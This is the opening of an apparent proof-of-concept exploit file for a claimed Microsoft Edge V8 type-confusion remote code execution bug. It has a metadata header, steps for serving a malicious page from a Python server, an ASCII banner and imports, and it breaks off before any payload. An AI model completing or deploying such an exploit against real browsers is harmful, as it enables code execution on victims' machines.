# Exploit Title: Microsoft Edge 150.0.4078.48 - RCE # CVE: CVE-2026-58289 # Date: 2026-07-10 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Author Blog : https://banyamersecurity.com/blog/ # Vendor Homepage: https://microsoft.com # Software Link: https://www.microsoft.com/en-us/edge # Affected: Microsoft Edge (Chromium-based) before 150.0.4078.48 # Tested on: Microsoft Edge 150.0.4070.x (Windows 11) # Category: Remote # Platform: Windows # Exploit Type: Remote Code Execution # CVSS: 9.0 (Critical) # Description: Access of Resource Using Incompatible Type ('Type Confusion' - CWE-843) in Microsoft Edge (Chromium-based) V8 engine allows an unauthorized attacker to execute arbitrary code over a network by visiting a malicious webpage. # Fixed in: Microsoft Edge 150.0.4078.48 (Stable Channel) # Usage: # python3 exploit.py # # Examples: # python3 exploit.py # # Options: # --port Custom port (default: 8080) # # Notes: # • This is a Proof of Concept only. No public full exploit is available yet. # • For educational and research purposes. # • Requires vulnerable version of Microsoft Edge. # # How to Use # # Step 1: # Run the Python server: python3 exploit.py # # Step 2: # Open http://localhost:8080 in a vulnerable version of Microsoft Edge. # # Step 3: # Monitor the browser process for crashes or code execution. def banner(): print(r""" ╔██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗╗ ║██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║ ║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ███████╔╝ ║██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╔═╗ Banyamer Security ╔═╝ """) import http.server import socketserver import sys banner() HTML_CONTENT = """